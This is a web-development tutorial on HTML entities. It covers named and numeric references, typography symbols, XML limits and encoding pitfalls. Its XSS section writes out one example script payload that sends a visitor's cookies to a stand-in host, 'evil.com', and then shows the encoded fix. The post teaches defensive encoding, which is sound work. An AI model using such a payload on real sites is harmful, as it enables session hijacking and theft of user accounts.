Encoding7 min read

HTML Entities: Special Characters in Web Development

Master HTML entities for displaying special characters in web pages. Covers named entities, numeric references, security implications, and common use cases.

You write <p>5 > 3</p> in your HTML and the browser swallows everything after the > as a broken tag. You try to display an ampersand in your content and the browser thinks you're starting an entity reference. These are the kinds of problems HTML entities solve — and if you've ever debugged a page where half the content disappeared, you've met these problems firsthand.

The Problem HTML Entities Solve

HTML uses certain characters as part of its syntax. The angle brackets < and > define tags. The ampersand & starts entity references. The double quote " delimits attribute values. When you want to display these characters as content rather than markup, you need a way to say "I mean the literal character, not the HTML syntax."

HTML entities are that escape mechanism:

&lt;    → <   (less than)
&gt;    → >   (greater than)
&amp;   → &   (ampersand)
&quot;  → "   (double quote)
&apos;  → '   (apostrophe/single quote)

Without them, the browser can't distinguish between <div> (a tag) and the text "5 < 10" (content containing a less-than sign). The entity &lt; unambiguously means "display a less-than sign here."

Convert between raw characters and HTML entities with the HTML Entities tool.

Named, Numeric, and Hex Entities

HTML provides three ways to reference the same character:

Named entities use a human-readable name: &copy; for ©, &euro; for €, &mdash; for —. There are about 2,200 named entities defined in the HTML5 specification.

Decimal numeric entities use the Unicode code point in decimal: &#169; for ©, &#8364; for €, &#8212; for —.

Hexadecimal numeric entities use the hex code point: &#xA9; for ©, &#x20AC; for €, &#x2014; for —.

All three produce the same result. Named entities are easier to read in source code. Numeric entities can represent any Unicode character, even those without a named entity.

<!-- All three display: © -->
&copy;
&#169;
&#xA9;

When should you use which? Named entities for common symbols (more readable). Numeric entities when you need a character that doesn't have a named entity, or when you're generating HTML programmatically and want consistency.

Essential Entities Every Developer Needs

Some entities come up so frequently that you should know them without looking them up:

The Big Five (Syntax Characters)

&lt;     <     Required in content to avoid tag interpretation
&gt;     >     Technically optional in most contexts, but use it for clarity
&amp;    &     Required everywhere — even inside attributes
&quot;   "     Required inside double-quoted attributes
&apos;   '     Required inside single-quoted attributes (HTML5)

Typography

&mdash;  —     Em dash (long dash for parenthetical statements)
&ndash;  –     En dash (for ranges: pages 1–10)
&hellip; …     Ellipsis (proper three-dot character)
&lsquo;  '     Left single quote (curly)
&rsquo;  '     Right single quote / apostrophe (curly)
&ldquo;  "     Left double quote (curly)
&rdquo;  "     Right double quote (curly)

Symbols

&copy;   ©     Copyright
&reg;    ®     Registered trademark
&trade;  ™     Trademark
&euro;   €     Euro sign
&pound;  £     British pound
&yen;    ¥     Japanese yen
&deg;    °     Degree symbol

Spaces and Formatting

&nbsp;         Non-breaking space (prevents line break)
&ensp;         En space (half an em)
&emsp;         Em space (width of capital M)
&thinsp;       Thin space
&shy;          Soft hyphen (breaks only when needed)
&zwj;          Zero-width joiner
&zwnj;         Zero-width non-joiner

&nbsp; is probably the most (ab)used entity in web development. Its real purpose is preventing line breaks between words that should stay together — "100 km" shouldn't break across lines. Using it for visual spacing is an anti-pattern — use CSS margins and padding instead.

HTML Entities and Security

Here's where entities stop being a formatting convenience and become a security requirement. Cross-Site Scripting (XSS) is consistently ranked among the top web vulnerabilities, and failing to encode entities is one of the primary attack vectors.

Consider a search page that displays the user's query:

<p>You searched for: USER_INPUT_HERE</p>

If a user searches for <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>, and you render that without encoding, the browser executes the script. The attacker just stole the user's session cookies.

The fix: encode all user-supplied content before rendering it in HTML:

<!-- Dangerous: raw user input -->
<p>You searched for: <script>alert('xss')</script></p>

<!-- Safe: encoded entities -->
<p>You searched for: &lt;script&gt;alert('xss')&lt;/script&gt;</p>

The encoded version displays the literal text instead of executing it.

⚠️

Every modern web framework (React, Vue, Angular, Django, Rails) auto-encodes output by default. But if you use "dangerouslySetInnerHTML" in React, {!! !!} in Blade, or "|safe" in Jinja2, you're bypassing that protection. Only use raw HTML injection when you've sanitized the content yourself.

Context Matters

HTML entity encoding protects against injection in HTML content and attributes. But it's not sufficient for all contexts:

  • Inside <script> tags: you need JavaScript string escaping, not HTML entities
  • In URLs: use URL encoding (percent-encoding), not HTML entities
  • In CSS: use CSS escape sequences
  • In HTML attributes without quotes: no encoding is sufficient — always quote your attributes

This is why security frameworks provide context-aware encoding functions rather than a single "encode everything" approach.

HTML Entities in XML and XHTML

XML defines only five built-in entities: &lt;, &gt;, &amp;, &quot;, and &apos;. All those named HTML entities like &copy; and &mdash;? They don't exist in XML unless you define them in a DTD.

This catches people off guard when working with XML documents. You write &copy; in an XML file, the parser throws an error about an undefined entity. The fix: use numeric entities (&#169;) in XML, or define the entities in your DTD.

XHTML, being XML-based, has the same limitation. HTML5 (which is not XML) supports all named entities natively.

<!-- Valid HTML5, invalid XML -->
<p>&copy; 2026</p>

<!-- Valid in both HTML5 and XML -->
<p>&#169; 2026</p>

Common Pitfalls

Double Encoding

You encode & to &amp;, then your template engine encodes the output again, turning &amp; into &amp;amp;. The user sees &amp; on the page instead of &.

This happens when you manually encode content that's also being auto-encoded by your framework. The fix: encode at one layer only. If your framework auto-encodes, don't pre-encode.

Encoding Inside Attributes

Attribute values need entity encoding too, especially for quotes:

<!-- Broken: quote ends the attribute early -->
<input value="He said "hello"">

<!-- Fixed: encoded quotes -->
<input value="He said &quot;hello&quot;">

<!-- Also valid: use single quotes for the attribute -->
<input value='He said "hello"'>

Missing Semicolons

Entity references end with a semicolon. Without it, browsers may try to be "helpful" and interpret the entity anyway, but the behavior is inconsistent:

&copy    <!-- Might work, might not — always add the semicolon -->
&copy;   <!-- Always works -->

HTML5 has complex rules about semicolon-less entity parsing. Don't rely on them. Always include the semicolon.

Copy-Paste Encoding Issues

When you copy text from a word processor into HTML, you might get "smart quotes" and em dashes that look fine in the browser but cause issues in systems expecting ASCII. If your HTML formatter shows unexpected characters, check for encoded typographic characters that should be plain ASCII.

Entities in Modern Development

In modern web development, you rarely write HTML entities by hand. React, Vue, and other frameworks auto-encode text content. CSS handles most typography (quotes, dashes) through font-variant and quotes properties. Unicode characters can be used directly in UTF-8 encoded HTML without entities.

So when do you still need entities?

  • CMS content where authors paste from Word or other rich text editors
  • Email HTML where encoding support varies wildly across clients
  • Generated HTML from APIs or databases that might contain unescaped markup
  • Legacy systems that don't support UTF-8 throughout the pipeline
  • Code examples in HTML that need to show literal tags and ampersands

Try It Yourself

Working with HTML entities is easier with the right tools:

All processing happens in your browser. Your content never leaves your machine.

Tools Mentioned

Related Articles